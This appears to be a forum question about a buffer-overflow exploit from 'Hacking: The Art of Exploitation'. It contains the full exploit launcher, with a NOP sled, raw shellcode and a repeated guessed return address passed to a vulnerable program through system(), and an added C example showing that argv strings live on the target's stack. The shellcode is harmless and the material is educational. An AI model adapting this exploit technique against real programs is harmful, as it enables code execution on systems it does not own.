I have recently been reading Hacking: The Art of Exploitation, but I am stuck on this piece of code.

```c
#include <stdlib.h>
#include <string.h>

/* Shellcode payload from the book: writes "hello hacking world\n" and exits. */
const char shellcode[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x14\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x68\x61\x63\x6b\x69\x6e\x67\x20\x77\x6f\x72\x6c\x64\x0a";

int main(int argc, char **argv) {
    /* The book's code assumes a 32-bit build: pointers fit in unsigned int. */
    unsigned int i, *ptr, ret, offset = 377;
    char *command, *buffer;

    /* The whole argument to the target is assembled in one heap buffer. */
    command = (char *)malloc(200);
    memset(command, 0, 200);
    strcpy(command, "./overflow_shellcode \'");
    buffer = command + strlen(command);

    if (argc > 1)
        offset = atoi(argv[1]);

    /* Guess the target's stack address from this process's own stack variable i. */
    ret = (unsigned int)&i - offset;
    for (i = 0; i < 160; i += 4)
        *((unsigned int *)(buffer + i)) = ret;      /* repeated return address */

    memset(buffer, 0x90, 60);                                /* NOP sled */
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);  /* shellcode after the sled */
    strcat(command, "\'");

    /* The target program receives the payload as its command-line argument. */
    system(command);
    free(command);
    return 0;
}
```
What I do not understand: the shellcode is on the heap, and ret is used to overwrite the return address. But i is on the stack, so rip will point to the return address and not to the heap. Am I right? Yet my test tells me the shellcode did execute. Why?
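An added example (not code from the book or from the question) showing the memory fact the question turns on: the command buffer lives on the exploit's heap, but it reaches `./overflow_shellcode` as a command-line argument, and the kernel places a new process's argv[] and envp[] strings on that process's stack. The classifier below is a constructed heuristic for Linux/x86-64 (the nearer of a stack probe and a heap allocation), and the function names are assumptions; it prints where argv and environment strings actually sit in the receiving process.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

extern char **environ;   /* environment strings, placed by the kernel at exec, like argv */

static uintptr_t absdiff(uintptr_t a, uintptr_t b) { return a > b ? a - b : b - a; }

/* Constructed classifier: 1 if p lies nearer a stack variable than a fresh heap
 * allocation. On Linux/x86-64 the initial stack (which also holds the argv[] and
 * envp[] strings) sits far above the brk heap and mmap regions, so "nearer" is
 * reliable for a demonstration; it is not a general-purpose oracle. */
int is_stack_resident(const void *p) {
    int probe;                          /* genuine stack variable */
    void *heap = malloc(64);            /* genuine heap allocation */
    uintptr_t addr = (uintptr_t)p;
    int nearer_stack = absdiff(addr, (uintptr_t)&probe) < absdiff(addr, (uintptr_t)heap);
    free(heap);
    return nearer_stack;
}

int local_is_on_stack(void) { int x = 0; return is_stack_resident(&x); }
int heap_is_on_stack(void)  { char *h = malloc(32); int r = is_stack_resident(h); free(h); return r; }

/* Environment strings arrive in this process exactly the way argv[] strings do.
 * Returns -1 when the process has no environment to inspect. */
int env_string_is_on_stack(void) {
    if (environ == NULL || environ[0] == NULL) return -1;
    return is_stack_resident(environ[0]);
}

int main(int argc, char **argv) {
    char *heap_arg = malloc(64);                     /* built on the heap, like `command` */
    strcpy(heap_arg, "constructed argument");
    printf("&argc    (stack) %p -> stack=%d\n", (void *)&argc, is_stack_resident(&argc));
    printf("heap_arg (heap)  %p -> stack=%d\n", (void *)heap_arg, is_stack_resident(heap_arg));
    printf("argv[0] string   %p -> stack=%d\n", (void *)argv[0], is_stack_resident(argv[0]));
    if (argc > 1)
        printf("argv[1] string   %p -> stack=%d\n", (void *)argv[1], is_stack_resident(argv[1]));
    if (environ && environ[0])
        printf("environ[0]       %p -> stack=%d\n", (void *)environ[0], is_stack_resident(environ[0]));
    free(heap_arg);
    return 0;
}
```

Run it with any argument and compare the address of argv[1] with &argc and with the heap pointer: the argument string is on the stack of the process that received it, which is why the exploit can aim ret at a stack address derived from its own &i rather than at its heap.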